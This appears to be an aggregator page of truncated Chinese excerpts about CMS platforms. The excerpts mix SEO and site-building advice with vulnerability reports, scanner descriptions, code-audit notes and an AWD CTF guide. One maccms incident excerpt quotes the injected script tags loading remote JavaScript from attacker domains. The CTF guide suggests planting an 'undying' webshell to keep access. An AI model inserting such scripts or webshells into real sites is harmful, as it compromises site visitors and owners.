信息收集无论是在渗透,AWD还是挖src中,都是重中之重的,就像《孙子兵法》中说到的"知彼知己,胜乃不殆;知天知地,胜乃可全",也就是"知己知彼,百战不殆"
目前苹果CMS官方在不断的升级补丁,官方最新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击,很多客户因此找到我们SINE安全寻求网站安全技术上的支持,针对该漏洞我们有着独特的安全解决方案以及防止挂马攻击的防护,包括一些未公开的maccms POC漏洞都有修复补丁。
CMSmap是一个Python编写的针对开源CMS(内容管理系统)的安全扫描器,它可以自动检测当前国外最流行的CMS的安全漏洞。 CMSmap主要是在一个单一的工具集合了不同类型的CMS的常见的漏洞。CMSmap目前只支持WordPress,Joomla和Drupal。 主要功能 1.其可以检测目标网站的cms基本类型,CMSmap默认自带一个WordPress,Joomla和Drupal插件列表,所以其也可以检测目标网 站的插件种类; 2.Cmsmap是一个多线程的扫描工具,默认线程数为5; 3.
只需要将二级域名输入进去即可,然后默认扫描的是80端口(Web服务),443端口(https服务)
大家好!我是小熊优化的SEOER,在seo优化这个行业已经从业7年多了,优化过不少的个人和企业网站,根据多年的经验也总结出了不少的优化经验,现在大部分的网站,尤其是单位性质的网站基本都是采用CMS系统来做的,今天,在这里我就分享一下这几年来我接触过的几个CMS系统的优化方面的特点,希望对大家有所帮助。
前几天白嫖了 XRAY 的高级版,因此试着利用XRAY+AWVS 的形式来看看能不能找到 CNVD 上公布存在问题 CMS 的漏洞。
本文由Tide安全团队成员“TideSec”首发于FreeBuf TideSec专栏:
移动互联网时代,传统企业网站不仅仅局限pc端网站,还会有H5端,微信小程序端,尤其是微信作为一个巨大的流量入口,微信小程序作为企业品牌和开战电商的必争之地。那么企业要实现pc网站,h5网站,小程度多端布局,那么采用cms系统这种成熟的方案是很多企业或网站建设公司最常用的选择,也是最实惠的方式。
一、Wolfcms简介 Wolf CMS是一款内容管理系统(CMS),是在GNUGeneral Public License v3下发布的免费软件。Wolf CMS是由PHP语言编写,是Frog CMS的一个分支。在2010年Packet Publishing开源项目评奖的“Most Promising Open Source Project”分类中杀进了决赛。 软件的官网为:https://www.wolfcms.org/ 二、Wolfcms 0.8.2中存在任意文件上传漏洞 2.1 Wolf CMS 0
最近有个74cms v4.2.3任意文件下载的漏洞,本来想试着和74cms 3.6 前台SQL注入漏洞结合下然后取出QS_pwdhash的值进行MD5碰撞,可惜了任意文件下载的漏洞并不影响74cms 3.6,所以就只能先复现下前台注入漏洞了。 本次实验任务 1.复现74cms 3.6 前台SQL注入漏洞。 2.尝试使用Python 自动获取数据库中的数据。 实验工具 1.PHPstudy 2.74cms 3.6 源码 (在文末有提供下载链接) 3.Python 2.7 漏洞复现过程 0x01 下载74cm
提到网站建设,最先想到的就是下载CMS建站系统来建站,当然不乏还有会外包定制的方式,那成本就另说了,采用CMS系统建站优势便是开发省时且价格给力,而且功能完整,比定制开发的体验性,功能性方面都强大很多。所以市面上才会出现了很多不同类型的CMS建站系统,那么从seo角度方面来考虑,怎么选择建站系统呢?
VulnX是一款自动化Shell注入工具,支持多种类型的内容管理系统,其中包括Wordpress、Joomla、Drupal和Prestashop等等,广大研究人员可以使用VulnX来检测这些CMS系统中的安全问题。
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站漏洞可以获取网站的管理员账号密码以及用户账号信息.
CNVD:https://www.cnvd.org.cn/flaw/show/CNVD-2021-84593
骑士cms人才系统,是一项基于php+mysql为核心的开源人才网站系统。
0.背景分析 当今的互联网站点,各种cms和框架大规模普及,这虽然方便了广大站长,但是这些开源项目的安全性不容乐观,比如前一阵子的strutsII漏洞使各大平台和高校网站被入侵。 如今各大漏洞库的建立为我们提供了丰富的漏洞资源。国内有乌云网,sebug,国际上有CVE和exploit-db。我们可以从这些网站和各大安全论坛获得漏洞资源,编写利用程序。 那么我们既然有如此丰富的资源,为何不编写一款可扩展的集成各种漏洞扫描和利用功能的渗透测试平台呢。 我与很多国内的黑客讨论过,他们表示正在写或者有意向编写一
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
概述 最近我们的一名安全托管客户反应,其服务器遭受到攻击,被黑客上传了webshell并篡改网页内容。经过我们为客户安装云锁防护软件后,拦截到一个针对海洋CMS(SEACMS)的0day漏洞。 海洋CMS是一套专为不同需求的站长而设计的视频点播系统,在影视类CMS中具有很高的市场占有率,其官方地址是:http://www.seacms.net/ 海洋CMS(SEACMS)几个老漏洞及其修补方法 在2017年2月,海洋CMS 6.45版本曾爆出一个前台getshell漏洞,漏洞具体内容参见:http://bl
PbootCMS是网站常用的一款CMS系统,是由国内著名程序开发商翔云科技研发的一套网站CMS系统,免费开源,扩展性较高,使用的企业很多但是避免不了网站存在漏洞,SINE安全对其代码进行安全审计的同时发现该pbootcms 存在严重的漏洞,包含SQL注入获取管理员密码漏洞,以及远程代码注入执行漏洞。该pbootcms系统采用的是PHP语言开发,数据库是MYSQL,并支持pgsql数据库大并发处理,系统默认支持的服务器环境,PHP5.3版本以上,以及mysql版本5.6,apache,nginx,都可以运行该CMS系统。关于这次检测出来的CMS漏洞,我们进行详细的介绍。
从事网站优化多年,接触过很多客户的网站,发现这些网站绝大部分都是采用cms搭建,接触多了,对cms系统这行也算半个专家,市面上cms系统很多,大大小小,收费的,免费的不下几百种,有主流的cms厂家,也有的很多老产品不更新了,也有一些是毕业设计作品或练手作品,功能参差不齐,一般不懂的还真不知道选择哪个好,所以如果大家需要做网站,通过下面的内容,就能对cms系统行业有一个大致的了解,从而可以选择合适的cms系统,下面百里营销的小编就给大家分享一些干货:
根据公告,6.x、7.x、8.x版本的子系统存在严重安全漏洞,利用该漏洞可能实现远程代码执行攻击,从而影响到业务系统的安全性,该漏洞跟CVE-2018-7600一样已经被在野利用,建议尽快更新到新的版本。
一个很老的cms了,感谢小阳师傅给的练手cms,以下仅为此cms其中一个任意文件读取漏洞和任意文件删除漏洞的审计笔记。
*本文原创作者:Mochazz,本文属FreeBuf原创奖励计划,未经许可禁止转载
故事发生在别人身上是故事,发生在自己身上,就是命运了,能原谅的,不说原谅也会原谅,不能原谅的,说了原谅也不会原谅。 --《于心有愧》 AWD,全称Attack With Defence,中文:攻防兼备,说白了就是攻击别人服务器的同时还要防御自身的服务器,攻击别人的服务器增分,被攻击则扣分,AWD一般设于CTF竞赛中的第二阶段,根据非官方合作伙伴提供的资料中显示:AWD其主要特点为:强调实战性、实时性、对抗性,综合考量竞赛队的渗透能力和防护能力。 本文围绕着bugku线上的AWD写,线下的还没参加过,没法写 bugku中线上的AWD,一般都是以cms为考点,考察一些cms有漏洞的版本(据说后面有pwn),bugku一只队里最多只能有三个人参加,所以建议可以分配好各自的任务 起手式①--查找 工具:xftp / Winscp 开局可以任意一名队友将代码备份下来,最重要有两个原因 1.源码下载下来可以丢到D盾,安全狗或者seay源码审计系统等安全工具检查有没有木马或者敏感未过滤的函数文件,一些比赛环境中,出题方会在某个文件中放置木马所以就需要自己去下载整个网站,然后放到工具中去检查,如果有木马,删掉即可,然后反手利用一波,再写一个不死马维持权限,Nice!!!;
Total.js CMS 12.0.0版本中存在命令注入漏洞,攻击者可利用该漏洞执行非法命令。
WordPress是一个基于PHP的内容管理系统 (CMS),可让您创建博客、网站或 Web 应用程序。WordPress 是全球数百万开发人员使用的开源耦合类型内容管理系统 CMS。与其他解决方案相比,使用和维护它的人数占 CMS 使用量的 43% 以上。
刚好前一段时间分析了这个cms的一个插件showtime的一个任意文件上传漏洞,大家还可以在从往期的文章中找到这漏洞链接如下
安全漏洞公告 2018年3月28日,Drupal官方发布了Drupal core存在远程代码执行漏洞的公告,对应CVE编号:CVE-2018-7600,漏洞公告链接: https://www.drupal.org/sa-core-2018-002 根据公告,Drupal 6.x、7.x、8.x版本的子系统存在严重安全漏洞,利用该漏洞可能实现远程代码执行攻击,从而影响到业务系统的安全性,建议尽快更新到新的版本。 同时,Drupal的分支版本Backdrop CMS在1.9.3之前的1.x.x版本也存在该漏洞,
2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们SINE安全寻求技术上支持,防止网站被挂马。根据客户的反应,服务器采用的是linux centos系统,苹果CMS版本是最新的V10版本,我们立即成立网站安全应急响应处理,帮助客户解决网站被攻击的问题。
这是 酒仙桥六号部队 的第 30 篇文章。全文共计2229个字,预计阅读时长8分钟。0x01 前言大家在做代码审计或者学习代码审计的过程中,会有大量时间是对着代码的。有时候会觉得代码枯燥无聊,看代码看到怀疑自我。这时候不妨通过其他思路,换个思维,看点有趣的相关事务。回过头来再看代码,也许会有意想不到的惊喜!0x02 查看各种记录更新日志我在 GITHUB上找
KKCMS是基于PHP+MYSQL开发的开源CMS。可以直接在GitHub上下载就可以了。
前言 发现有小伙伴对cve这种证书念念不忘 想起来自己刚入行的时候 也在满世界的寻找如何获取cve证书的途径。 现在发现申请cve证书非常简单。 1 想要申请当然需要一个漏洞了。 这里比较简单的就是一些大的cms的插件。 比如wordress的插件。 又比如在github找一写小众的源码。 又比如在源码站上找一下简单的cms。 cms寻找平台: https://www.sourcecodester.com/ 图片 图片 github 图片 方式方法有很多,上述只做参考。 找到cms,审计出漏洞之后,记得记
CMS Made Simple(CMSMS)是一个简单且便捷的内容管理系统,它使用PHP、MySQL和Smarty模板引擎开发,具有基于角色的权限管理系统,基于向导的安装与更新机制,对系统资源占用少,同时包含文件管理、新闻发布以及RSS等模块。在CMS Made Simple <= 2.2.9的版本中存在一个基于时间的SQL盲注漏洞。通过将一个精心构造的语句赋值给新闻模块中的m1_idlist参数,可以利用该SQL盲注漏洞。
企业网站主要用于向外界展示企业产品和形象,如果网站内容丰富,页面美观,用户体验好,将会为企业带来潜在的用户,现在很多企业有建站的想法,但却苦于不懂技术或成本上考虑,迟迟没有进展。
CMSeeK是由python3编写的,因此你需要安装python3的运行环境。此外,CMSeeK当前仅支持基于unix的系统,对于Windows系统的支持在后续会陆续添加。CMSeeK依赖git进行自动更新,因此请确保你已安装了git。
之前一直使用dedeCms建站的,时间也算很长了,但是最近我们公司用dede做的网站被频繁被挂马,网上已经找不到解决方法,客户天天投诉,dedecms从原创团队解散后,几年了基本没有什么更新和维护,没有办法只能重新寻找新的cms改版。
现在建网站,90%都会采用cms建站系统、可是优秀的建站系统那么多,像国外的JOOMLA、WORDPRESS,国产的PageAdmin、织梦DEDECMS、JTBC、DISCUZ等;网上也有一大堆测评资讯,有说这个好,有说那个差,究竟选哪个?很多小白会很纠结。
0x00 背景 本周,拿到一个源码素材是08cms的,由某师傅提供的,审计的时候发现这个CMS数据传递比较复杂,使用静态分析的方式不好操作,刚好这周小三上位(换了新电脑),就直接安装下。phpstorm+xdebug+xdebug-ext(火狐)进行动态分析,本篇主要是以SQL注入漏洞为例子,进行动态分析的演练,当然源码还有其他漏洞待挖掘,期待师傅们一起交流讨论。 0x01 审计过程 动态分析环境配置 动态分析组合:phpstorm+xdebug+xdebug-ext(火狐) 相信小伙伴们关注本公号这么久
•形如: www.xxx.com www.xxx.com/bbs www.xxx.com/old•渗透思路:网站可能有多个cms或框架组成,那么对于渗透而言,相当于渗透目标是多个(一个cms一个思路)
这里感觉就是member这个目录是后台登入目录了,不过不急,我们在收集一下端口开放情况。这里使用的是nmap,fofa
最近一直在学习《[红日安全]代码审计》系列中关于php代码中存在的问题,从中受益匪浅。从中选取了一个DM企业建站的cms用作练习,在还原了练习中的漏洞后尝试对其进行代码审计,运用近期学习到的php审计知识点对该cms进行了审计,并很幸运的发现了一枚远程代码执行漏洞。接下来详细记录了漏洞发现的过程与大家交流学习。
Joomla是继WordPress和Shopify之后的第三大免费开源内容管理系统(CMS)。它是用来建立网站和发布网络内容的。其用户友好的格式使其在大众中高度流行。Joomla使用面向对象的编程技术以及软件设计模式,用PHP编写。它的数据存储在MySQL数据库中。
现在很多人都想制作一个个人博客,前端html静态页面,免费的很多,但是拿到一个静态页面,自己并不知道怎么用。你可以选择下载免费的博客程序源码,或者cms。这些开源的博客程序源码,都是经过很多次版本测试的,都有固定的使用人群。我所知道的主流的博客程序有,Z-blog,Emlog,WordPress,Typecho等,免费的cms系统有,织梦cms(dedecms),phpcms,帝国cms(EmpireCMS)等。这些都是开源免费的程序,用它们来做一个个人博客网站,是可以的。 很多新手站长不知道该如何选择合适的博客程序源码来搭建自己的个人独立博客,主要原因还是不太了解这些博客程序的特点。这些博客程序都有它的使用教程,如果你有足够的时间,可以选择去学习。 我相信很多站长,都使用过以上的博客程序源码。我先来简单说说,我在使用这些博客程序源码的一个体验感受: 1、Z-Blog。Z-blog博客程序的特点在于它有asp,php两个版本,有可选择性,页面静态化做得比较好,有利于SEO优化。但Z-blog目前提供的不少主题模板和插件是收费的,而且主题不是很多。 2、Emlog。Emlog(点滴记忆),程序大小只有500KB左右。它的特点就是源程序文件非常小。Emlog的基本功能比较简单,对于做一个简单的博客来说足够。不够完美的地方在于,Emlog不能html静态化,支持的是伪静态。 3、WordPress。相比较前两个来说,WordPress的人气应该是最高的,WordPress的博客主题很多,免费的,付费的,更新也快。WordPress程序依托的是插件和主题,作为国际性开源程序,它的功能非常强大。美中不足的地方在于,它的插件多,网站速度加载会比较慢。 4、织梦cms(dedecms)。最新版本V5.7SP2正式版,更新时间:2018年01月09日。dedecms采用PHP+MySQL的技术架构,个人站长用得也比较多,因为它上手快,标签好调用,对于想做资讯网站的站长来说,简单看看教程,也能在短时间学会。dedecms是完全开源的,不足的地方在于,漏洞很多,网站时不时被攻击挂马。 5、PHPCMS。最新版 V9.6.3 ,更新时间:2017年05月15日。使用的MVC模式编程,模块化的设计,非常适合网站的二次开发,从后台的美观度来说,PHPCMS V9的后台界面最为美观,操作也简单。我记得dede和帝国cms还在用table的时候,phpcms开发模板用的是div+css,界面好看布局又合理。就扩展性来说,不是很好,v9之后,就不再更新了。 6、帝国cms。从安全性来说,帝国CMS,PHPCMS的安全性高,没有什么漏洞,帝国cms页面静态化,利于优化,而且扩展性很好,适合做二次开发。但从美观度来说,帝国cms不重视这些,甚至很多都是table布局。之前我写过一篇文章,《个人博客,我为什么要用帝国cms?》,也是在使用了以上这些博客程序源码后写的一个总结,兜兜转转,最后还是使用了帝国cms,作为我的博客程序。 以上这些,仅属于个人观点,每个程序都有它的优缺点,选择什么样的程序源码,看个人的需求和爱好。比如,有程序基础的,喜欢易于开发和灵活性强的,可以选择帝国cms。喜欢漂亮的,后台易于操作的,想经常换主题的,可以选择wordpress,总的来说,根据个人的情况来选择,选适合自己的,慢慢熟悉系统。
首先信息收集,是渗透测试中的一项重中之重!如果服务器是一个保险柜,那么你想要打开这个保险柜,首先你得了解它是什么做的,怎么样的架构,才能去考虑怎么动手。
互联网普及后,企业由于发展和宣传需要,都会建设自己企业的网站,但是建设一个网站费用问题是很模糊的概念。因为需求决定了价格。今天,小熊优化的小编就为大家说一说建设一个网站需要多少钱。
这个不是0day,我手里也没0day,算是一个漏洞的二次审计,一篇随便写写的记录文,还请各位大牛多多交流。 0x01 偶遇 有一个目标站,扫了一下旁站,用工具没有拿到几个cms的指纹。很奇怪,随手点一个,发现下面有powered by fineCMS。我记得以前也见过这个cms,是用CI框架二次编写的cms,网上搜索搜索“finecms漏洞”,找到的都是1.7.2版本以前的(seay博客里有1.7.2注射: http://www.cnseay.com/tag/finecms%E6%BC%8F%E6%B4%9E/)。但是这个网站是v2.0.12.版本比较新。
苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,<script src=https://lefengtv.com/js/tjj.js></script><script src=https://pkvod.com/1.js</script>,尤其电影片名d_name值被直接篡改,并且是批量挂马,导致用户打开网站访问直接弹窗广告并跳转。
领取专属 10元无门槛券
手把手带您无忧上云